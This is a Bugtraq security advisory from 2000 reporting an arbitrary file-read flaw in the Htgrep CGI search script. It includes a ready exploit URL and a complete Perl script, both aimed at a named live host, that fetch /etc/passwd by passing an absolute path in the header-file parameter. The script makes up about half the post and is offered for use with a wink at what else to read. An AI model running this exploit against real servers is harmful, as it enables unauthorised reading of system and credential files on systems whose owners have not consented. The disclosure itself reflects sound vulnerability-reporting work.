Date: Thu, 17 Aug 2000 13:41:42 -0000 From: n30 <n30@GMX.CO.UK> Subject: Htgrep CGI Arbitrary File Viewing Vulnerability To: BUGTRAQ@SECURITYFOCUS.COM Software: Htgrep URL: http://www.iam.unibe.ch/~scg/Src/Doc/ Version: All Versions Platforms: Unix maybe Winnt? Author status: Notified Summary: Any remote user can view arbitrary files on the system with the privileges of the web user Vulnerability: The CGI allows a user to specify a header and footer file to be appended to the search output, this file should be located in the wwwroot which is specified in the script itself. Any attempt to specify a header or footer file by using backwards directory referencing is trapped. Although it is possible to specify a file using an absolute path. Exploit: http://www.dematel.com/cgibin/htgrep/file=index.html&hdr=/et c/passwd The File /etc/passwd will be displayed instead of the default header file. Fixes: The author has been notified, it is likely that an update will be available shortly. n30 n30@gmx.co.uk Exploit Follows: #!/usr/local/bin/perl # # Htgrep EXPLOIT Script by n30 17/8/2000 # # For: Unix/Linux all Distro's # maybe Winnt?? anyone?? # # Versions: All upto latest: htgrep v3.0 # # Info: to find the version number being used: # # www.server.com/cgi-bin/htgrep/version # # Some ppl use a wrapper for the script thusly # eliminating the file argument, the sploit will # still werk just add &hdr=<filename> to the end :-) # # if &isindex=<text> is present in the URL REMOVE IT!!! # or else the exploit won't werk :-) # # Mail : n30@gmx.co.uk use strict; use LWP::UserAgent; use HTTP::Request; use HTTP::Response; my $ua = new LWP::UserAgent; # ************************************************* my $TargetHost="www.dematel.com"; my $TargetPath="/cgibin/htgrep"; # SearchFile can commonly be index.html or some other file in the wwwroot my $SearchFile="index.html"; # FiletoGet ?? think for ur self :-) my $FiletoGet="/etc/passwd"; # ************************************************** my $url="http://".$TargetHost.$TargetPath."/file=$SearchFile&hd r=$FiletoGet"; print("\nHtgrep Arbitrary File Reading Vulnerability EXPLOIT /n30\n\n"); print("URL: $url\n\n"); my $request = new HTTP::Request('GET', $url); my $response = $ua->request($request); if ($response->is_success) { print $response->content; } else { print $response->error_as_HTML; } # Definitely NOT Hack.co.za #